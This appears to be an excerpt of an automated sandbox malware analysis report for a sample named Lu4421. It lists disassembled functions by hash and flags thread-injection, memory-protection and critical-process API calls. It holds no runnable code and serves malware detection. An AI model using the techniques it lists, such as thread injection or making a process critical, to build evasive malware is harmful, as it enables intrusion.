                                                                                  • Instruction ID: 64cea9b9394f98dafa91f7f8cef6ce879599479ba87177dfc335600a92253eba
                                                                                  • Opcode Fuzzy Hash: 50747e73f40024901f0a54bdd5b7d36f5b000c61ec3249b52c5c61945a5dc641
                                                                                  • Instruction Fuzzy Hash: B4D05B3151C74D4BC354DF14E4505DAB7A0FF81324F400B3DF06A831E5DE6596858682
                                                                                  Function 00007FFD9B7FBA07 Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae734dadbeb0e66981049dda344b69998a56c55535d9cf7c510df33463077aa7
                                                                                  • Instruction ID: 354b4b3d921a4d2aa65ee70686d5265db1135880e33f619d0a15f2b646679444
                                                                                  • Opcode Fuzzy Hash: ae734dadbeb0e66981049dda344b69998a56c55535d9cf7c510df33463077aa7
                                                                                  • Instruction Fuzzy Hash: 14D05E3291CB0D4BC315DF14E4508DAB7B0FF88328F440B3DE0AE921E9DF6893818686
                                                                                  Function 00007FFD9B7F3E00 Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1891240270a2556ccd33c754778626767371eb82577f276abb11889f150f05a
                                                                                  • Instruction ID: d111adf8221e99334e1a3225c6da3e2f348242c356c9bf1aaa896e83803d3a93
                                                                                  • Opcode Fuzzy Hash: a1891240270a2556ccd33c754778626767371eb82577f276abb11889f150f05a
                                                                                  • Instruction Fuzzy Hash: 71D0A710F5D6856BE34573F85826B9D65E19FC5210F7181B9E44DC35E7DC0C68058327
                                                                                  Function 00007FFD9B7F3D5B Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c4eaa5ac530b2666618335e037d8d17d5eef5dd81574435454a90e4c29c683b
                                                                                  • Instruction ID: 88cad657e66971e92b15bf3c132874bd3216063f1eed6c45cf07ed7ba8828bd1
                                                                                  • Opcode Fuzzy Hash: 6c4eaa5ac530b2666618335e037d8d17d5eef5dd81574435454a90e4c29c683b
                                                                                  • Instruction Fuzzy Hash: 69D05E20B4C5816BD34573F8541ABADB6E19F95310F2041A9E409C35D7CC5C98818352
                                                                                  Function 00007FFD9B7FE0B7 Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6094c1ee3df90c18b1826e14b1cb78b168264d65e1df407c356db372f79aeb1f
                                                                                  • Instruction ID: 0becfa7eab965494d4da4afd385cd6ea17b028bd46d19f2fdb6838960cc62f92
                                                                                  • Opcode Fuzzy Hash: 6094c1ee3df90c18b1826e14b1cb78b168264d65e1df407c356db372f79aeb1f
                                                                                  • Instruction Fuzzy Hash: E7D05B3250C7094BC344DF04D4904DA77A1FF94324F440B3DE0AD951E5DF6893828686
                                                                                  Function 00007FFD9B7FFEF3 Relevance: .0, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 687e0e2c6866620ec4745417c88304b6e29e69dc4dda75d87d5b5522e2331dc1
                                                                                  • Instruction ID: ff11e60b9f9c7e80b980319149853bc4310ee1fdf2c990c0ae03e2f1ae6236c3
                                                                                  • Opcode Fuzzy Hash: 687e0e2c6866620ec4745417c88304b6e29e69dc4dda75d87d5b5522e2331dc1
                                                                                  • Instruction Fuzzy Hash: 76C0123265C64D47D311AA50E4518EEB360EF91314F440F39F04A460A9ED6A6A958586
                                                                                  Function 00007FFD9B800579 Relevance: .0, Instructions: 11COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bcb73b7f5ba8a81c7689c01a8b106210b9d5e35b3f9c45999fdb6ba20355eacf
                                                                                  • Instruction ID: 1080b652435edc98a303b7bb699a29333d95d75633638ac18cb91c39242f7b6f
                                                                                  • Opcode Fuzzy Hash: bcb73b7f5ba8a81c7689c01a8b106210b9d5e35b3f9c45999fdb6ba20355eacf
                                                                                  • Instruction Fuzzy Hash: 9EC04C12B6A54EC9E57467D464222FDB211DF496A2F520132C25AC1191CD4E261015C2

                                                                                  Non-executed Functions

                                                                                  Function 011AF5A5 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 283threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • OpenThread.KERNEL32(A848C3AF0FF675CB,?,?,-12175FEC,00000000,Function_00658E77,01265F2C,FFFACFE9000061A4,00000000,00000000), ref: 011AF625
                                                                                  • OpenThread.KERNEL32 ref: 011AF6BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenThread
                                                                                  • String ID: HoS
                                                                                  • API String ID: 3092547327-1171368488
                                                                                  • Opcode ID: 3b3766579aec45e5da8ebc09b021071bb72cef53e6c8ded242f601e0651796cc
                                                                                  • Instruction ID: b76f7be400553c08a0eab57d9ecadc2ab437bacc46fac57c718682c3ce2a334b
                                                                                  • Opcode Fuzzy Hash: 3b3766579aec45e5da8ebc09b021071bb72cef53e6c8ded242f601e0651796cc
                                                                                  • Instruction Fuzzy Hash: 5BB1FFBBA09A01CFD32D8E39D8416ED3BB1E348768F864E16CF4547B5DD73464A68B01
                                                                                  Function 011AC0A0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 260COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8ze@
                                                                                  • API String ID: 0-602619046
                                                                                  • Opcode ID: daa42f7b4e63ac29d297ad2843e41827590ef2ee3bb6ee077a437b85d7583511
                                                                                  • Instruction ID: 28ff30caf0b6fe4ee6fbc8fab2e3e86ea69db6f967de370b0ba65afbd4288b34
                                                                                  • Opcode Fuzzy Hash: daa42f7b4e63ac29d297ad2843e41827590ef2ee3bb6ee077a437b85d7583511
                                                                                  • Instruction Fuzzy Hash: 6DB1E0B7608640CFD7298F39C485AED3BB1E748B18BC54E16DB4947B0ECB34A466CB85
                                                                                  Function 011AF200 Relevance: 1.5, APIs: 1, Instructions: 14synchronizationCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32 ref: 011AF22E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 24740636-0
                                                                                  • Opcode ID: 8d36e95842ef906194a775cef9e3b67eacf1bf11023a8f30a70f3cb859bc6891
                                                                                  • Instruction ID: 60ae89a2d02b420c3886251c5faf8f971da7556929f7840c80bcd48ec8036cd1
                                                                                  • Opcode Fuzzy Hash: 8d36e95842ef906194a775cef9e3b67eacf1bf11023a8f30a70f3cb859bc6891
                                                                                  • Instruction Fuzzy Hash: 7CD05EBF505022CA83288FF950400DC3B91D795BBC3D90F22CE31926DDDB30A0628BD9
                                                                                  Function 00007FFD9B7FF25A Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0\+t
                                                                                  • API String ID: 0-2513549349
                                                                                  • Opcode ID: cd6497cb6133322ef6ca442cc93ddebb34426f23af68b7e6bd24a6a6e507a7a3
                                                                                  • Instruction ID: f9827d11ddb65b3c747df80ddf938e9eadef69f15a2462ca50a3e69610df6332
                                                                                  • Opcode Fuzzy Hash: cd6497cb6133322ef6ca442cc93ddebb34426f23af68b7e6bd24a6a6e507a7a3
                                                                                  • Instruction Fuzzy Hash: 5751A95158F7C22FD35393B858665967FE19F83160B2E41EFD488CF0A7D84D584AC322
                                                                                  Function 00007FFD9B7F10D8 Relevance: 12.8, Strings: 10, Instructions: 310COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8+t$([+t$08+t$@8+t$@[+t$P8+t$X8+t$h8+t$p8+t$x8+t
                                                                                  • API String ID: 0-2819705010
                                                                                  • Opcode ID: 89f9531d66155d854ad73901cedbd9806565b5b1da788441b2701ce8e9329375
                                                                                  • Instruction ID: 68f386cf98c6093e2c870bf7bd71ce73b23006c19ff3d66e132c01661cd8457f
                                                                                  • Opcode Fuzzy Hash: 89f9531d66155d854ad73901cedbd9806565b5b1da788441b2701ce8e9329375
                                                                                  • Instruction Fuzzy Hash: 1DB11421A4E7C99FD7628BB450655D57FF0DF06230B2A02EAC884DF4B7E81CAD86C712
                                                                                  Function 00007FFD9B800667 Relevance: 12.6, Strings: 10, Instructions: 142COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (8+t$(8+t$0[+t$88+t$88+t$@[+t$@[+t$@[+t$H8+t$H8+t
                                                                                  • API String ID: 0-723544440
                                                                                  • Opcode ID: 8341c0168d7f3ec60e226020a10ff87c3a521a553b60789ddb1f7310a66fdbf1
                                                                                  • Instruction ID: 3d179675f5ae8cc0b2e173541d023656444d70da4db739b9efb4b95c1c4a5db5
                                                                                  • Opcode Fuzzy Hash: 8341c0168d7f3ec60e226020a10ff87c3a521a553b60789ddb1f7310a66fdbf1
                                                                                  • Instruction Fuzzy Hash: 9041233024D7899FC766DFB898665967BE0EF0623036405EEC4C6CF1A6DA2CEC46C741
                                                                                  Function 011AC333 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 197threadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$ContextSuspend
                                                                                  • String ID: 8ze@
                                                                                  • API String ID: 3869801871-602619046
                                                                                  • Opcode ID: e2e49c63ee166648cad4e42db64edfe8d60a693c42b8f5343a54cea94099546b
                                                                                  • Instruction ID: 63b311252fc4c5321e16fc82e091e538dbf97a70c0a8d2b2b7edc66b9c897a35
                                                                                  • Opcode Fuzzy Hash: e2e49c63ee166648cad4e42db64edfe8d60a693c42b8f5343a54cea94099546b
                                                                                  • Instruction Fuzzy Hash: 4181AEBBA08A00CFD3298F39C445AED3BB1F748718B854E15DB8547B4ECB34A466CB95
                                                                                  Function 011AAE84 Relevance: 6.2, APIs: 4, Instructions: 199threadinjectionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$ContextSuspend
                                                                                  • String ID:
                                                                                  • API String ID: 3869801871-0
                                                                                  • Opcode ID: af0167766193ae95b7fe03570cdab8c8a8d3511a709267d932d5c06689703557
                                                                                  • Instruction ID: dc43f6de5ad02e698b7b031a04685ddbab127c40a8d2663e83f8ec31b847179a
                                                                                  • Opcode Fuzzy Hash: af0167766193ae95b7fe03570cdab8c8a8d3511a709267d932d5c06689703557
                                                                                  • Instruction Fuzzy Hash: 3581F3B7609680CFD3298F38D841AED3BB1E744728BC64E16CB5507B5DCB34A4A6CB44
                                                                                  Function 00007FFD9B7F2968 Relevance: 5.1, Strings: 4, Instructions: 61COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t$H\+t$P\+t$X\+t
                                                                                  • API String ID: 0-1589304457
                                                                                  • Opcode ID: 2d5e08a9186276df3afd427ab7bf4b391d1eb7635a952f7672f26f74accf550c
                                                                                  • Instruction ID: e427a4a5a06f612b6bfed35c83f02b8b7e081294ec31ce65409e8cc802705efa
                                                                                  • Opcode Fuzzy Hash: 2d5e08a9186276df3afd427ab7bf4b391d1eb7635a952f7672f26f74accf550c
                                                                                  • Instruction Fuzzy Hash: 6711C13064954D8FCB86EFA8C8549ED7BF1FF4532071500EAC449EB1A2D72CAC86CB10

                                                                                  Execution Graph

                                                                                  Execution Coverage:22.9%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:15.1%
                                                                                  Total number of Nodes:53
                                                                                  Total number of Limit Nodes:5
                                                                                  execution_graph 5316 7ffd9b7d7c7c 5319 7ffd9b7d7430 5316->5319 5320 7ffd9b7d8000 5319->5320 5323 7ffd9b7d7420 5320->5323 5322 7ffd9b7d7c87 5324 7ffd9b7d81e0 5323->5324 5330 7ffd9b7d7408 5324->5330 5326 7ffd9b7d81f1 5327 7ffd9b7d81f6 5326->5327 5335 7ffd9b7d7418 5326->5335 5327->5322 5329 7ffd9b7d8294 5329->5322 5331 7ffd9b7d8270 5330->5331 5332 7ffd9b7d7418 NtProtectVirtualMemory 5331->5332 5334 7ffd9b7d829c 5331->5334 5333 7ffd9b7d8294 5332->5333 5333->5326 5337 7ffd9b7d84b0 5335->5337 5336 7ffd9b7d861b 5336->5329 5337->5336 5338 7ffd9b7d87a4 NtProtectVirtualMemory 5337->5338 5339 7ffd9b7d87e5 5338->5339 5339->5329 5344 7ffd9b7d7b55 5345 7ffd9b7d7b5f 5344->5345 5348 7ffd9b7d04b8 5345->5348 5347 7ffd9b7d7c4c 5350 7ffd9b7d7da0 5348->5350 5349 7ffd9b7d7f0b 5349->5347 5350->5349 5351 7ffd9b7d7420 NtProtectVirtualMemory 5350->5351 5352 7ffd9b7d812f 5351->5352 5352->5347 5340 7ffd9b7d89f5 5341 7ffd9b7d8a1f RtlSetProcessIsCritical 5340->5341 5343 7ffd9b7d8ab0 5341->5343 5362 7ffd9b7d81d8 5363 7ffd9b7d7408 NtProtectVirtualMemory 5362->5363 5364 7ffd9b7d81f1 5362->5364 5363->5364 5365 7ffd9b7d7418 NtProtectVirtualMemory 5364->5365 5367 7ffd9b7d81f6 5364->5367 5366 7ffd9b7d8294 5365->5366 5368 7ffd9b7d8708 5369 7ffd9b7d870f NtProtectVirtualMemory 5368->5369 5371 7ffd9b7d87e5 5369->5371 5353 7ffd9b7d7ff8 5354 7ffd9b7d8000 5353->5354 5355 7ffd9b7d7420 NtProtectVirtualMemory 5354->5355 5356 7ffd9b7d812f 5355->5356 5357 7ffd9b7d7d8d 5359 7ffd9b7d7da0 5357->5359 5358 7ffd9b7d7f0b 5359->5358 5360 7ffd9b7d7420 NtProtectVirtualMemory 5359->5360 5361 7ffd9b7d812f 5360->5361 5372 7ffd9b7d847e 5373 7ffd9b7d84b0 5372->5373 5374 7ffd9b7d861b 5373->5374 5375 7ffd9b7d87a4 NtProtectVirtualMemory 5373->5375 5376 7ffd9b7d87e5 5375->5376

                                                                                  Executed Functions

                                                                                  Function 00007FFD9B7D7418 Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2958525442.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7d0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50696c639d9b07bf93d6f6bb6e97adf519ca5497d258247584bfed8d91a77917
                                                                                  • Instruction ID: 389d98584a525e18ad6d746f9e5089dff75212ec7f7b2a01094c020417d381fc
                                                                                  • Opcode Fuzzy Hash: 50696c639d9b07bf93d6f6bb6e97adf519ca5497d258247584bfed8d91a77917
                                                                                  • Instruction Fuzzy Hash: FDC10731E0CA0D4FE71DAB6898566FA77E1EF95320F44427ED05BC31EAED6878068781
                                                                                  Function 00007FFD9B7D8708 Relevance: 1.6, APIs: 1, Instructions: 126nativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 646 7ffd9b7d8708-7ffd9b7d87e3 NtProtectVirtualMemory 651 7ffd9b7d87eb-7ffd9b7d8816 646->651 652 7ffd9b7d87e5 646->652 652->651
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2958525442.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7d0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  • Opcode ID: 976bbe6d6e9948f463c5f2cb95f457656e8aa277f929dc5ca310297bc94cab1a
                                                                                  • Instruction ID: ebe2c947691913ecd9765f4ca0f98d9fc9aa6acb08376d773f2e714aa4ab7d48
                                                                                  • Opcode Fuzzy Hash: 976bbe6d6e9948f463c5f2cb95f457656e8aa277f929dc5ca310297bc94cab1a
                                                                                  • Instruction Fuzzy Hash: 8731C531A0CB4C8FDB18DB5C98166ED77E1EB98320F00426FE04ED3296CA75A8058BC1
                                                                                  Function 00007FFD9B7D89F5 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 654 7ffd9b7d89f5-7ffd9b7d8aae RtlSetProcessIsCritical 658 7ffd9b7d8ab6-7ffd9b7d8ad8 654->658 659 7ffd9b7d8ab0 654->659 659->658
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2958525442.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7d0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: 4143ee2cdf260f5506b5073a8268654289d226dc1449c19deab6cb9866ae21f2
                                                                                  • Instruction ID: 8095d2eed091f189637bc7098020f6170bf888cfb0d24f2264de38fb3d2d2b5e
                                                                                  • Opcode Fuzzy Hash: 4143ee2cdf260f5506b5073a8268654289d226dc1449c19deab6cb9866ae21f2
                                                                                  • Instruction Fuzzy Hash: 9E312C3050D7884FD719DBA8DC55AE97FF0EF9A320F0401AFD08AD3563CA696846CB51